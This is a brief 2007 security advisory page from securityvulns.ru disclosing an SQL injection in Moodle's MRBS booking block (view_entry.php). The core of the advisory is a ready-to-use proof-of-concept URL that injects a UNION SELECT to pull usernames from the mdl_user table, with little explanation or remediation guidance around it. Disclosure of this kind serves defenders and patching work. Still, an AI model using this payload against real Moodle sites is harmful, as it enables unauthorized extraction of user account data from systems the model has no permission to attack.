Computer Security

Security Advisory: Moodle SQL Injection
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Logaholic Web Analytics Software

  Jupiter Cms Multiple Vulnerabilities

  [waraxe-2007-SA#060] - Sensitive info disclosure in CuteNews <= 1.4.5

  [ISecAuditors Security Advisories] Tikiwiki CMS is vulnerable to path traversal attack

From:root_(at)_hanicker.it <root_(at)_hanicker.it>
Date:21.12.2007
Subject:Moodle SQL Injection

Moodle.org

PATH/moodle/ing/blocks/mrbs/code/web/view_entry.
php?id=[SQL]&day=27&month=10&year=2007

And a POC:
PATH/moodle/ing/blocks/mrbs/code/web/view_entry.
php?id=2000%20UNION%20SELECT%20username,id,id,id,id,id,id,id,id,id,
id,
id%20FROM%20mdl_user%20WHERE%20id=[ID]&day=27&month=10&
year=2007
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server